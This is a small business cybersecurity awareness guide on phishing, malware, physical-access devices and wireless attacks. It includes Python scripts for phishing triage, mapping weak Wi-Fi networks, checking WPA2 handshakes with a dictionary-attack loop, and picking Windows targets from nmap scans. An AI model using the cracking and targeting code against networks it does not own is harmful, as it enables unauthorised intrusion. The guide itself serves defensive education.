Small Business Cyber Security Awareness Guide

November 26, 2017 | Author: JT Hickman | Category: Malware, Phishing, Online Safety & Privacy, Computer Security, Computer Virus



Introduction

Business owners know potential customers are connected to the Internet at home, at work and on the go. Smartphones, tablets, laptops, desktops, televisions, gaming consoles, automobiles and appliances are all devices that connect people, and their money, to a world-wide market. Just as the Internet changed the game for businesses, it also opened the world up to attack by a new breed of "cyber-criminals". These hackers use the Internet from remote locations to attack networks and devices all over the world. Over the years, criminals have preferred to target businesses over individuals because businesses hold more profitable information to steal. The evening news is filled with stories of data breaches and corporations being attacked for data such as credit card numbers, social security numbers and bank account information. But over the last few years, hackers have realized that large companies are investing heavily in cybersecurity, deploying the latest intrusion detection technology and hiring teams of information security professionals to protect their data, devices and networks. That realization has placed a new target in their sights: the small business. According to customer surveys conducted by Towergate Insurance (2017):

o 97% of their small business customers did not make improving online security a priority;
o 82% do not think they are targets of attackers because they believe they have nothing worth stealing;
o 32% do not believe they would lose revenue from a day of downtime after an attack;
o 31% do not have an action plan for responding to a security breach;
o 24% think cyber security costs too much; and
o 22% admit they would not know where to start when it comes to implementing security.

Why are small businesses targets of cyber-crime?

Do most small business owners know they are now the main target? The answer is a resounding no. In an article discussing the rise of attacks targeting small businesses, Smith (2016) points out that cyber security experts say one of the most dangerous phrases used by small businesses is "It'll never happen to us". In this year's Internet Security Threat Report, Symantec (2016) found that three out of every five cyber-attacks targeted small businesses. That is a huge increase, and looking at Symantec's data over the last five years, criminals are focusing more and more of their targeted attacks on small businesses.

It is easy to understand why many small businesses feel they would not be targeted. They believe they are too small and that hackers would not be interested in what they do, when the opposite is true. Hackers know that small businesses tend to have weaker defenses than large corporations. "By their very nature, thriving small businesses are innovative and niche, which again is very attractive to the bad guys who may be interested in customer data and intellectual property and know exactly how to pick out the weak targets."

Why should small businesses secure their network and devices?

Examples of small businesses being hacked with disastrous results are discussed in an article from My Digital Shield (2015). The first example covers a NYC mannequin maker that had more than $1.2M stolen from its accounts as the result of a hack into its online transactions. The company kept getting error messages when it tried to make online payments and did not realize the site it was paying on was a spoofed copy of the real website; the payments were being taken and dispersed into four other banks, and from there to others. Another example describes the owner of two small magazine shops in Chicago, who was notified by a credit card company that a data breach had sent his customers' credit card information to Russia. "Who would want to break into us?" the owner asked, after determining that the breach cost his business almost $22,000. The owner of a burger restaurant in Bellingham, Washington was hacked twice over a two-year period because no security tools or configurations were in place. The credit card company shut off his account and seized money from incoming payments, and the owner was forced to close, even after spending $12,000 on an investigation and remediation payments. According to the U.S. Department of Health & Human Services (2010), the theft of a single unencrypted laptop led to a small Massachusetts provider settling a case for $1.5 million for violating HIPAA privacy and security rules. Data breaches cost much more than money: they damage reputations. Losing trust can cost not only existing partners and customers but future customers and business partnerships as well.

What threats do small businesses face from cyber-criminals?

The main goal of this Cyber Security Awareness Guide is to give small business owners an educational reference to help protect their company and its assets. Simply being aware that the business is a target and knowing the methods attackers use will reduce the chances of a successful breach.

• Malware – Malware is a broad term covering any computer code written with malicious intent, whether to destroy something on a computer or to steal data. Malware is often introduced to a system via email attachments, embedded in software downloads, or through unpatched operating system and application vulnerabilities. Some examples are:

o Trojan – A Trojan horse, or Trojan, is malware disguised as legitimate software (a game, a utility, an "update") so that the user installs and runs it willingly. Once running, it typically opens a backdoor or installs further malware.

o Virus – A computer virus spreads by copying itself into other program files, moving from one computer to another, infecting systems and flooding networks as it travels. Almost all viruses attach to an executable file, which means the virus may exist on a system but will not be active or able to spread until a user runs or opens the infected host file or program.

o Worm – Computer worms are similar to viruses in that they replicate copies of themselves and can cause the same type of damage, but they do not require a host program or any user action to spread; they attack network services directly.

o Spyware – Spyware is malware generally bundled with downloadable files without the user's knowledge, used to capture keystrokes, passwords or other data and send it to the attacker.

Example: Ever seen a popup warning that the system is infected and that software needs to be downloaded to clean it? Or a popup stating "Congratulations, you have won a free…"?

These are traps used by hackers, often embedded in websites most users should avoid, such as "free" movie or music download sites. A user who isn't aware may panic and install the real malware payload, giving away control of their own system while thinking they were fixing a problem they never had.

• Phishing – Phishing is the attempt to gather usernames, passwords, credit card numbers or other sensitive information by presenting a malicious link, attachment or request in a seemingly legitimate email. The best defense against phishing is learning how to recognize it. Examples: One of the most popular email phishing schemes is to spoof what looks like an official email from a prominent bank. It happens so often that Bank of America (2017), in order to protect its customers and others, set up an Online Banking Email Fraud page on its website to warn of this activity.

According to PhishTank (2016), here are some things to look for in a phishing email:

1. Generic greeting. To save time, Internet criminals send phishing emails in large batches and use generic greetings and sender names like "Security Alert" or "Generic Bank Name Customer" so they don't have to address each recipient by name and send emails one by one.

2. Spoofed link. Even if a link shows a recognizable name, that does not mean it goes to the real organization. Hover the mouse over the link and compare the address that appears with the one printed in the email; if they differ, don't click. Also check that any page asking for personal information begins with "https" (the "s" stands for secure) and that the domain after it really belongs to the organization. Be aware that "https" alone proves only that the connection is encrypted, not that the site is legitimate: phishing sites obtain certificates too, so the correct domain matters more than the padlock. Example:

3. Links to fake account pages. The point of a phishing email is to trick someone into providing personal information. If an email requests personal information, it is most likely a phishing attempt. In this sample, the email sends the recipient to a fake Google page in order to steal their login name and password. The same is done with fake banking pages and with social media sites like Facebook or Twitter. Example:

4. Sense of urgency. Internet criminals try to elicit personal information quickly by convincing the user that something has happened which requires an immediate response. The faster they get the information, the faster they can move on to the next victim.
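The four indicators above can be checked mechanically. The script below is an added example written for this guide's readers, not code from PhishTank or from the original page: it takes one raw email, extracts the links from its HTML body and reports which of the indicators it finds. The two sample messages, the genericbank.example domain and the phrase lists are all constructed for the example.

```python
"""Heuristic phishing triage for one raw email (constructed example, not PhishTank code)."""
import email
import re
from email import policy
from email.utils import parseaddr
from html.parser import HTMLParser
from urllib.parse import urlparse

GENERIC_GREETINGS = ("dear customer", "dear user", "dear member",
                     "valued customer", "dear account holder")
URGENCY_PHRASES = ("immediately", "within 24 hours", "has been suspended",
                   "unusual activity", "will be closed", "verify your account")
LOGIN_PATH_WORDS = ("login", "signin", "verify", "account", "secure")


class LinkExtractor(HTMLParser):
    """Collect (visible text, href) pairs from the <a> tags of an HTML body."""

    def __init__(self):
        super().__init__()
        self.links = []
        self._href = None
        self._text = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href = dict(attrs).get("href") or ""
            self._text = []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append(("".join(self._text).strip(), self._href))
            self._href = None


def registered_domain(host):
    """Last two labels ("secure.genericbank.example" -> "genericbank.example").
    A production filter would consult the Public Suffix List instead."""
    labels = host.lower().rstrip(".").split(".")
    return ".".join(labels[-2:]) if len(labels) >= 2 else host.lower()


def analyze(raw_message, trusted_domains):
    """Return the list of phishing indicators found in one RFC 5322 message."""
    msg = email.message_from_string(raw_message, policy=policy.default)
    findings = []
    body = msg.get_body(preferencelist=("html", "plain"))
    html = body.get_content() if body is not None else ""
    plain = re.sub(r"<[^>]+>", " ", html).lower()

    if any(g in plain for g in GENERIC_GREETINGS):     # indicator 1
        findings.append("generic greeting")
    if any(u in plain for u in URGENCY_PHRASES):       # indicator 4
        findings.append("urgency language")

    sender_domain = registered_domain(parseaddr(msg.get("From", ""))[1].split("@")[-1])
    extractor = LinkExtractor()
    extractor.feed(html)
    for text, href in extractor.links:
        target = urlparse(href)
        target_domain = registered_domain(target.hostname or "")
        # Indicator 2: the visible text names one site, the href goes to another.
        shown = urlparse(text if "://" in text else "http://" + text)
        if shown.hostname and "." in shown.hostname and registered_domain(shown.hostname) != target_domain:
            findings.append("spoofed link: shows %s but goes to %s" % (shown.hostname, target.hostname))
        # Plain http on a link that asks for data. https alone proves nothing
        # (phishing sites get certificates too), so this is only one signal.
        if target.scheme != "https":
            findings.append("non-https link: " + href)
        # Indicator 3: a login/verification page on a domain we do not trust.
        if target_domain not in trusted_domains and any(w in target.path.lower() for w in LOGIN_PATH_WORDS):
            findings.append("login page on untrusted domain: " + target_domain)
        if target_domain != sender_domain:
            findings.append("link domain %s differs from sender domain %s" % (target_domain, sender_domain))
    return findings


# Constructed sample messages; the bank, people and domains are made up.
SAMPLE_PHISH = """\
From: Generic Bank Security <security@genericbank.example>
To: owner@smallbiz.example
Subject: Unusual activity on your account
Content-Type: text/html; charset=utf-8

<html><body><p>Dear Customer,</p>
<p>We detected unusual activity. Your online access has been suspended and will be
closed unless you verify your account within 24 hours.</p>
<p><a href="http://genericbank-secure-login.example/verify">https://www.genericbank.example/account</a></p>
</body></html>
"""

SAMPLE_LEGIT = """\
From: Generic Bank <statements@genericbank.example>
To: owner@smallbiz.example
Subject: Your November statement is ready
Content-Type: text/html; charset=utf-8

<html><body><p>Hello Pat,</p><p>Your statement is available at
<a href="https://www.genericbank.example/statements">www.genericbank.example/statements</a>.</p></body></html>
"""

if __name__ == "__main__":
    for name, raw in (("phish", SAMPLE_PHISH), ("legit", SAMPLE_LEGIT)):
        print(name, analyze(raw, {"genericbank.example"}))
```

Run it against a suspicious message saved as .eml (File > Save As in most mail clients). A hit on any single indicator is not proof; the value is in seeing two or three together, which is how the PhishTank list is meant to be read.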

• Password Attacks: There are several types of password attacks:

o Fake websites: Spoofed sites that look real but are not. Often a user clicks on a link in an email, on a website or even in a social media messenger that redirects them to a fake login page that looks very real, and the password typed into it goes straight to the attacker.

o Brute-force and dictionary attacks – A program guesses passwords until one works. A pure brute-force attack tries every combination of characters; a dictionary attack tries lists of common passwords and dictionary words, usually with variations such as appended digits or a capitalized first letter, which is far faster and cracks most human-chosen passwords. Cain and Abel is a Windows password recovery tool that performs both kinds of attack against captured or dumped password hashes. Should a thief steal a laptop, it is easy to boot it from a USB drive running hacking tools, copy the stored password hashes for offline cracking (or simply reset the account password) and log on. Full-disk encryption such as BitLocker or FileVault, together with a firmware password that blocks booting from USB, is what prevents this.

Mobile Smart Devices – The New Threat

Over the years, the primary targets of hackers have been the servers, desktops and laptops of businesses, because they have been the primary devices connected to the Internet. In much the same way cyber-criminals redirected their focus from large businesses to small ones, cybersecurity analysts say nefarious forces are increasingly turning their attention to the most personal computer one owns, the device carried everywhere and trusted with some of the most sensitive secrets: the mobile smart device. "Over the last two years or so, we have seen a huge influx" in the number of hackers targeting smartphones, Roel Schouwenberg, principal security researcher for Kaspersky Labs, told CBC News (2014) in a story discussing how these devices are becoming prime targets for criminal hackers. Mobile smart devices are small electronic gadgets that put the power of a computer in the palm of a hand, connected to other devices and networks via wireless protocols such as Bluetooth, NFC, Wi-Fi and 3G/4G cellular service. Smartphones and tablets carry the most personal and financial information a small business owner has, in contact lists, online shopping, mobile banking and credit card apps. Internet access via a mobile smart device also lets small business owners reach cloud storage, where they may keep important business documents, contracts, bids, service level agreements and much more. Many small business owners also use smartphones and tablets to process credit cards using third-party magstripe and smart-chip readers and installed mobile apps. The breach of one of these devices by criminals would be devastating to a small business and its customers.

Hackers have started targeting these devices in several ways. Sometimes it is malware implanted using the same email attacks directed at personal computers, delivered via mobile email apps. SMiShing (SMS phishing) is another common method: an SMS text that looks like an account notification, sent in the hope that the device owner will tap the link and install malware on the phone or type credentials into a fake page.

In a review of Mobile Malware Evolution 2016 by Unuchek (2017), it was reported that Kaspersky Labs detected 8,526,221 malicious installation packages, 128,886 mobile banking Trojans and 261,214 mobile ransomware Trojans. The trends of 2016 were:

o Growth in the popularity of malicious programs using super-user (root) rights, primarily advertising Trojans.
o Distribution of malware via Google Play and advertising services.
o Emergence of new ways to bypass Android protection mechanisms.
o Growth in the volume of mobile ransomware.
o Active development of mobile banking Trojans.

This year, Unuchek (2017) of Kaspersky Labs reported that they have started calculating the distribution of mobile malware by the number of detected installation packages.

In 2016, the volume of mobile Trojan-Ransomware increased noticeably, both in the number of users attacked and in the number of installation packages detected.

Latest Hacking News (2017) posted an article showing images of a Samsung Galaxy S7 hacked with ransomware, where the victim was infected while using the popular Facebook Messenger app. A penalty notice warned the victim that they would be reported as having child sexual abuse content on the phone unless a ransom was paid via the online payment platform PaySafeCard.

Physical Access

What if a thief breaks into a small business owner's car or home and steals their laptop? What if a criminal gains access to a home office by break-in, or by social engineering tactics such as posing as a city inspector, a gas company employee claiming there is a gas leak, or a person from the "cable company" here to fix the wireless problem he created himself by jamming the wireless access point? Even if a computer has a password, that does not mean a hacker cannot get to the data. Simply inserting a USB key and booting from it grants access to the disk of a computer that has not been properly configured and encrypted: the logon password protects the session, not the files.

Once the computer has been booted from the USB drive, the attacker has full access to the hacking toolkit it carries, as well as to all of the files on the hard drive.

Here we see access all the way down to the Documents folder containing the vital working documents of our small business owner. These can be copied to the USB drive for later review. The hacker can also embed malware into the system or into any of the files on it, and if those files are emailed to another location, the hacker has a backdoor in.

Given physical access to a device, a hacker could plug a keylogger into an open USB port, plant a wired or wireless implant, or boot an unencrypted laptop or desktop to steal data. Many criminals use social engineering skills to put themselves into positions that allow physical access, such as posing as cable installers, maintenance personnel, telephone or power workers, or potential customers. Physical security is every bit as important as cybersecurity.

o Keyloggers – Hardware keyloggers sit between the keyboard and the computer and record every keystroke, including user IDs and passwords. A related class of "bad USB" attack devices goes further: by emulating combinations of trusted USB devices, such as gigabit Ethernet adapters, serial ports, flash storage and keyboards, they trick the computer into divulging data, handing over documents, installing backdoors and more.

Would the average computer user notice this little key grabber plugged in between the computer and the keyboard?

The Hak5 Bash Bunny is a USB attack platform of this kind, capable of carrying multiple payloads. Plugged into a long cable connected to a USB port in the back of a computer case, it is easily hidden and goes unnoticed.

A Raspberry Pi Zero W (right) running Kali Linux is a portable, fully operational hacking PC. Easily hidden in an office and running wirelessly, the device can reach information on the network and transmit it over the Internet anywhere in the world. Running PoisonTap (left), it can attack even locked workstations: plugged into a USB port, it poses as a network adapter and hijacks the machine's web traffic and browser cookies without a logon.

Examples of real hacking techniques.

The most effective way to demonstrate weaknesses to a small business is to use the same mindset, tools and methods as cybercriminals and hackers. This guide demonstrates how devices and networks are compromised by attacking systems set up to mirror the environment many home-based businesses use to conduct their day-to-day business.

Attacking the Network

• Find the target with WarDriving: Using a laptop connected to a wireless adapter and a USB GPS receiver is the old-school, tried and true way for a hacker to drive around in a vehicle surveying the area for wireless networks and evaluating their security. A more modern technique is to use a smartphone, since it has wireless and GPS built in. The collected information (SSID, BSSID, encryption type, signal strength and coordinates) is stored in a database for later analysis. The data can be sorted and imported into a mapping application like Google Earth to give the hacker a roadmap, or uploaded to websites where wardrivers collaborate and share information with each other. That information is then publicly available, not just to hackers but to people looking for open access points from which to download or upload illegal content or send spam. When the authorities investigate, the trail leads to some innocent home or business owner instead of the perpetrator.

• Wireless Password Theft – Password theft on wireless networks is generally achieved in one of two ways:

o Fluxion – Wireless Access Point Spoofing: Spoofing works by presenting users with what looks like a legitimate Wireless Access Point (WAP), when in reality it is just a laptop with two wireless cards playing man in the middle. The rogue WAP broadcasts what appears to be the real SSID and tricks users into connecting to it. When the user types the network password into the fake access point's login page, the hacker stores it.

o WiFite – Handshake capture and offline cracking: The stealthier way to crack a wireless password is to capture real traffic between a legitimate user and the WAP. The tool sends a de-authentication frame that kicks a client off the wireless network, then captures the WPA/WPA2 four-way handshake when the client reconnects. The handshake does not contain the password, but it does contain a value derived from it, so the capture is taken back to a more powerful computer, where each word in a dictionary list is tried until one reproduces the captured value.

• Footprinting: Once the hacker has access to the internal network, information gathering begins with scan tools that find the devices on it. Once the devices are detected, the scan identifies the operating system type so that targeted payloads can be launched. NMap is the tool used to find devices and determine the operating system.

• Attack Systems: Attack a system with live exploits to gain access by delivering a payload that lets the hacker control it. The demonstration covers the AFTER of the attack so as not to spread live attack methods and techniques.

WarDriving Demonstration: Kismet

A Kali Linux laptop running Kismet, connected to a TP-Link wireless adapter and a GlobalSat USB GPS receiver, wardriving a neighborhood to collect wireless access point information and GPS locations.

The collected data can be extracted from the wardriving database and imported into a mapping program like Google Earth.

Modern wardrivers keep it simple, using smartphones that have wireless and GPS built in. While the range is not the same as an old-school laptop with an external adapter, a smartphone running the WiGLE WiFi app is far more discreet and still effective.

Once the data is captured, it can easily be uploaded to a site used by wardrivers to collaborate and share captured data.
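What the wardriver does with the collected data, as an added example that is not code from Kismet, WiGLE or the original guide: read an export, flag networks that are open or still using WEP or TKIP, and write the placemarks into a KML file that Google Earth opens directly. The CSV below is constructed and follows the column layout of a WiGLE WiFi export (including the one-line banner the app puts before the header); Kismet's own CSV uses other column names, so rename them if you feed it Kismet output. A small business owner can run the same script against a public export to see whether their own SSID shows up as a weak target.

```python
"""Wardriving export -> weak-network list + Google Earth KML (constructed example)."""
import csv
import io
from xml.sax.saxutils import escape

# Constructed sample in the WiGLE WiFi export layout. The first line is the app's
# banner, not part of the table. Coordinates and MACs are made up.
SAMPLE_EXPORT = """\
WigleWifi-1.4,appRelease=2.x,model=demo,release=demo
MAC,SSID,AuthMode,FirstSeen,Channel,RSSI,CurrentLatitude,CurrentLongitude,AltitudeMeters,AccuracyMeters,Type
00:11:22:33:44:55,SmallBizDemo,[WEP],2017-11-20 10:12:01,6,-61,48.7519,-122.4787,30,8,WIFI
00:11:22:33:44:66,CoffeeShop-Guest,[ESS],2017-11-20 10:13:40,11,-70,48.7522,-122.4791,30,10,WIFI
00:11:22:33:44:77,HomeOffice,[WPA2-PSK-CCMP][ESS],2017-11-20 10:14:05,1,-55,48.7525,-122.4799,30,6,WIFI
00:11:22:33:44:88,OldRouter,[WPA-PSK-TKIP][WPA2-PSK-TKIP+CCMP][ESS],2017-11-20 10:15:30,6,-80,48.7530,-122.4803,30,12,WIFI
00:11:22:33:44:99,NoFix,[WPA2-PSK-CCMP][ESS],2017-11-20 10:16:00,6,-85,,,,,WIFI
"""


def classify(auth_mode):
    """Map a WiGLE AuthMode string such as '[WPA2-PSK-CCMP][ESS]' to (label, reason)."""
    mode = auth_mode.upper()
    if "WEP" in mode:
        return "weak", "WEP key is recoverable in minutes"
    if "WPA" not in mode:
        return "open", "no encryption: anyone in range can join and sniff"
    if "TKIP" in mode:
        return "weak", "TKIP cipher is deprecated; use WPA2-CCMP (AES) only"
    return "ok", "WPA2 with CCMP"


def parse_export(text):
    """Return one dict per access point that has a GPS fix."""
    if text.startswith("WigleWifi"):            # drop the app banner line
        text = text.split("\n", 1)[1]
    rows = []
    for row in csv.DictReader(io.StringIO(text)):
        try:
            lat, lon = float(row["CurrentLatitude"]), float(row["CurrentLongitude"])
        except (KeyError, ValueError):
            continue                             # no GPS fix: cannot be mapped
        label, reason = classify(row.get("AuthMode", ""))
        rows.append({"bssid": row["MAC"], "ssid": row["SSID"], "auth": row["AuthMode"],
                     "lat": lat, "lon": lon, "rssi": int(row["RSSI"]),
                     "label": label, "reason": reason})
    return rows


def weak_networks(rows):
    """The access points a wardriver would mark as easy targets."""
    return [r for r in rows if r["label"] in ("open", "weak")]


def to_kml(rows):
    """KML document with one placemark per access point; Google Earth wants lon,lat,alt."""
    placemarks = []
    for r in rows:
        placemarks.append(
            "<Placemark><name>{name}</name><description>{desc}</description>"
            "<Point><coordinates>{lon},{lat},0</coordinates></Point></Placemark>".format(
                name=escape(r["ssid"] or "<hidden>"),
                desc=escape("%s %s %s: %s" % (r["bssid"], r["auth"], r["label"], r["reason"])),
                lon=r["lon"], lat=r["lat"]))
    return ('<?xml version="1.0" encoding="UTF-8"?>\n'
            '<kml xmlns="http://www.opengis.net/kml/2.2"><Document>\n'
            + "\n".join(placemarks) + "\n</Document></kml>\n")


if __name__ == "__main__":
    aps = parse_export(SAMPLE_EXPORT)
    for ap in weak_networks(aps):
        print("%-18s %-20s %s" % (ap["bssid"], ap["ssid"], ap["reason"]))
    with open("wardrive.kml", "w") as f:
        f.write(to_kml(aps))
```

Open wardrive.kml in Google Earth to see the map the attacker sees. If your own network is in the weak list, the fix is on the router: WPA2 with AES/CCMP only, a long passphrase, and WPS disabled.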

Wireless Access Point Spoofing Demonstration: Fluxion

Fluxion tricks a user into giving away their password: it captures the handshake from the real wireless access point, then jams that access point while putting up a fake one for the victim to enter their password into. In this demonstration, Fluxion has targeted the SmallBizDemo network.

Once the target wireless access point has been identified and the deauth command is sent, the Android device is kicked off the real access point.

When the device reconnects to the real WAP, it performs the encrypted four-way handshake, which Fluxion captures. The handshake does not reveal the password, but it gives Fluxion a way to check one later.

When the check handshake option is selected, the information gathered from the WAP is displayed. A fake access point is then created with that information, jamming the original access point while presenting clients with the spoofed SSID.

When presented with the fake WAP, the victim enters the ACTUAL password, thinking they are connecting to the real AP.

Fluxion compares the password entered by the victim against the captured encrypted handshake and confirms that it is authentic. Because the check is done against the real handshake, Fluxion never has to guess: it simply keeps the fake portal up until the victim types the correct password.
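What "compare the password to the captured handshake" means in practice, and what WiFite's offline dictionary step does with a capture, as an added example that is not code from Fluxion, WiFite or the guide. It implements the WPA2 key derivation both tools rely on: PBKDF2 turns the passphrase and SSID into the PMK, PRF-512 expands the PMK with both MAC addresses and both nonces into the PTK, and the first 16 bytes of the PTK (the KCK) authenticate the EAPOL message; a candidate passphrase is correct exactly when it reproduces the captured MIC. Because there is no real capture here, the "handshake" is constructed from a known passphrase with fixed nonces and an abbreviated placeholder EAPOL frame; the check itself is the real one.

```python
"""Check candidate Wi-Fi passphrases against a WPA2 4-way handshake (constructed example)."""
import hashlib
import hmac


def pmk_from_passphrase(passphrase, ssid):
    """802.11i: PMK = PBKDF2-HMAC-SHA1(passphrase, ssid, 4096 iterations, 32 bytes)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf512(key, label, data):
    """802.11i PRF-512: HMAC-SHA1(key, label || 0x00 || data || i) for i = 0..3, truncated to 64 bytes."""
    out = b"".join(hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
                   for i in range(4))
    return out[:64]


def derive_ptk(pmk, ap_mac, client_mac, anonce, snonce):
    """PTK = PRF-512(PMK, "Pairwise key expansion", min(AA,SPA)||max(AA,SPA)||min(nonces)||max(nonces))."""
    data = (min(ap_mac, client_mac) + max(ap_mac, client_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    return prf512(pmk, b"Pairwise key expansion", data)


def eapol_mic(kck, eapol_frame):
    """WPA2 (key descriptor version 2): MIC = HMAC-SHA1(KCK, frame with MIC field zeroed)[:16]."""
    return hmac.new(kck, eapol_frame, hashlib.sha1).digest()[:16]


def passphrase_matches(candidate, ssid, ap_mac, client_mac, anonce, snonce, eapol_zeroed, captured_mic):
    """The check Fluxion runs on the victim's input and a cracker runs on every wordlist entry."""
    pmk = pmk_from_passphrase(candidate, ssid)
    kck = derive_ptk(pmk, ap_mac, client_mac, anonce, snonce)[:16]
    return hmac.compare_digest(eapol_mic(kck, eapol_zeroed), captured_mic)


def dictionary_attack(wordlist, handshake):
    """Offline attack: return the first word that reproduces the captured MIC, else None."""
    for word in wordlist:
        if passphrase_matches(word, **handshake):
            return word
    return None


def make_demo_handshake(real_passphrase, ssid="SmallBizDemo"):
    """Build a fake 'capture' from a known passphrase. Constructed data, not a real handshake:
    the MACs and nonces are fixed values and the EAPOL body is an abbreviated placeholder
    with its 16-byte MIC field zeroed, which is all the verification needs."""
    ap_mac = bytes.fromhex("001122334455")
    client_mac = bytes.fromhex("66778899aabb")
    anonce = hashlib.sha256(b"anonce-demo").digest()
    snonce = hashlib.sha256(b"snonce-demo").digest()
    eapol_zeroed = b"\x01\x03\x00\x75\x02\x01\x0a" + snonce + b"\x00" * 16 + b"\x00" * 40
    pmk = pmk_from_passphrase(real_passphrase, ssid)
    kck = derive_ptk(pmk, ap_mac, client_mac, anonce, snonce)[:16]
    return {"ssid": ssid, "ap_mac": ap_mac, "client_mac": client_mac,
            "anonce": anonce, "snonce": snonce, "eapol_zeroed": eapol_zeroed,
            "captured_mic": eapol_mic(kck, eapol_zeroed)}


if __name__ == "__main__":
    capture = make_demo_handshake("correct horse battery")
    wordlist = ["123456", "password", "smallbiz2017", "correct horse battery", "letmein"]
    print("victim typed the right password:", passphrase_matches("correct horse battery", **capture))
    print("dictionary attack recovered:", dictionary_attack(wordlist, capture))
```

Each candidate costs 4096 HMAC-SHA1 rounds, which is why WPA2 cracking is slow in Python and fast on a GPU with hashcat, and why a long random passphrase rather than a dictionary word is the only defense once a handshake has been captured. Hiding the SSID does not help: the SSID is part of the derivation and is recovered from the capture.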

Brute Force Cracking Demonstration: WiFite

WiFite is an automated wireless attack tool that can mount multiple attacks against WEP- and WPA-protected access points. WiFite excels at:

• sorting targets by signal strength, cracking the closest access points first
• automatically de-authenticating clients of hidden networks to reveal their SSIDs
• filtering to specify exactly what to attack: WEP, WPA or both
• an "anonymous" feature that changes the MAC address to a random one before attacking, then changes it back when the attacks are complete
• smart WPA de-authentication, cycling between per-client and broadcast deauths
• displaying a session summary at exit, showing the cracked keys
• saving all cracked passwords to cracked.txt

Start WiFite and choose a network adapter capable of monitor mode.

When monitoring starts, a list of access points is presented; in this case the SmallBizDemo wireless access point will be the target of the attack.

In just minutes, the WEP encryption key is attacked and recovered, demonstrating how easy it is to break WEP. Any router still set to WEP should be switched to WPA2 today.

Footprinting: Gathering information about the target by running NMap scans against the network and its systems' ports. The process begins by running NMap on the compromised network to gather information about its systems, scanning the entire subnet.

• The HP computer with the IP of will be the target, as it is probably a Windows computer. Running NMap against that IP address confirms the suspicion.

Now that a target has been chosen and an often-exploited operating system has been found, the attack changes to methods specific to that system, delivered over the wireless network.
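Reading the scan output is the part of footprinting that decides which machine becomes the target. As an added example, not part of the guide and not nmap's own code, the script below parses the XML that nmap writes with -oX, lists each live host with its open ports and best OS guess, picks out the probable Windows machines, and reports the services a home office should not have reachable over Wi-Fi. The scan XML is constructed to look like an nmap -O run against a small subnet; the addresses, MACs and hostnames are made up.

```python
"""Parse nmap -oX output and report what an attacker on the LAN would target (constructed example)."""
import xml.etree.ElementTree as ET

# Constructed output in the shape nmap produces for "nmap -O -oX scan.xml 192.168.1.0/24".
SAMPLE_SCAN = """<?xml version="1.0" encoding="UTF-8"?>
<nmaprun scanner="nmap" args="nmap -O -oX scan.xml 192.168.1.0/24" version="7.60">
<host><status state="up"/>
  <address addr="192.168.1.1" addrtype="ipv4"/>
  <address addr="00:11:22:33:44:55" addrtype="mac" vendor="TP-Link"/>
  <hostnames><hostname name="router" type="PTR"/></hostnames>
  <ports>
    <port protocol="tcp" portid="53"><state state="open"/><service name="domain"/></port>
    <port protocol="tcp" portid="80"><state state="open"/><service name="http"/></port>
  </ports>
  <os><osmatch name="Linux 3.2 - 4.9" accuracy="96"/></os>
</host>
<host><status state="up"/>
  <address addr="192.168.1.20" addrtype="ipv4"/>
  <address addr="00:11:22:33:44:66" addrtype="mac" vendor="Hewlett Packard"/>
  <hostnames><hostname name="HP-DESKTOP" type="PTR"/></hostnames>
  <ports>
    <port protocol="tcp" portid="135"><state state="open"/><service name="msrpc"/></port>
    <port protocol="tcp" portid="139"><state state="open"/><service name="netbios-ssn"/></port>
    <port protocol="tcp" portid="445"><state state="open"/><service name="microsoft-ds"/></port>
    <port protocol="tcp" portid="3389"><state state="closed"/><service name="ms-wbt-server"/></port>
  </ports>
  <os>
    <osmatch name="Microsoft Windows Server 2008 R2" accuracy="90"/>
    <osmatch name="Microsoft Windows 7 SP1" accuracy="95"/>
  </os>
</host>
<host><status state="up"/>
  <address addr="192.168.1.30" addrtype="ipv4"/>
  <ports><port protocol="tcp" portid="9100"><state state="open"/><service name="jetdirect"/></port></ports>
</host>
<host><status state="down"/><address addr="192.168.1.31" addrtype="ipv4"/></host>
</nmaprun>
"""

# Services that are a remote-access or file-sharing foothold when reachable from the Wi-Fi.
RISKY_PORTS = {21: "FTP: cleartext logins", 23: "telnet: cleartext logins",
               139: "NetBIOS session service", 445: "SMB file sharing",
               3389: "RDP remote desktop", 5900: "VNC remote control"}


def parse_nmap_xml(xml_text):
    """Return one dict per host that nmap reported as up."""
    hosts = []
    for host in ET.fromstring(xml_text).iter("host"):
        status = host.find("status")
        if status is None or status.get("state") != "up":
            continue
        entry = {"ip": None, "mac": None, "vendor": None, "hostname": None,
                 "open_ports": [], "os": None, "os_accuracy": 0}
        for addr in host.findall("address"):
            if addr.get("addrtype") == "ipv4":
                entry["ip"] = addr.get("addr")
            elif addr.get("addrtype") == "mac":
                entry["mac"], entry["vendor"] = addr.get("addr"), addr.get("vendor")
        name = host.find("hostnames/hostname")
        if name is not None:
            entry["hostname"] = name.get("name")
        for port in host.findall("ports/port"):
            state = port.find("state")
            if state is not None and state.get("state") == "open":
                svc = port.find("service")
                entry["open_ports"].append((int(port.get("portid")), port.get("protocol"),
                                            svc.get("name") if svc is not None else None))
        for match in host.findall("os/osmatch"):      # keep the most confident OS guess
            accuracy = int(match.get("accuracy", "0"))
            if accuracy > entry["os_accuracy"]:
                entry["os"], entry["os_accuracy"] = match.get("name"), accuracy
        hosts.append(entry)
    return hosts


def likely_windows(entry):
    """OS fingerprint says Windows, or the classic Windows RPC/SMB trio is listening."""
    os_name = (entry["os"] or "").lower()
    return os_name.startswith("microsoft windows") or any(p in (135, 139, 445) for p, _, _ in entry["open_ports"])


def exposure_report(hosts):
    """(ip, port, why it matters) for every risky service found open."""
    return [(h["ip"], port, RISKY_PORTS[port]) for h in hosts
            for port, _, _ in h["open_ports"] if port in RISKY_PORTS]


if __name__ == "__main__":
    scan = parse_nmap_xml(SAMPLE_SCAN)
    for h in scan:
        ports = ", ".join("%d/%s" % (p, s or "?") for p, _, s in h["open_ports"])
        print("%-14s %-12s %-28s %s" % (h["ip"], h["hostname"] or "-", h["os"] or "unknown OS", ports))
    print("probable Windows targets:", [h["ip"] for h in scan if likely_windows(h)])
    for ip, port, why in exposure_report(scan):
        print("  fix:", ip, port, why)
```

Run the same scan against your own network from a machine you own (nmap -O -oX scan.xml 192.168.1.0/24) and feed the file to parse_nmap_xml; anything in the exposure report is what the attacker in this section sees first.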

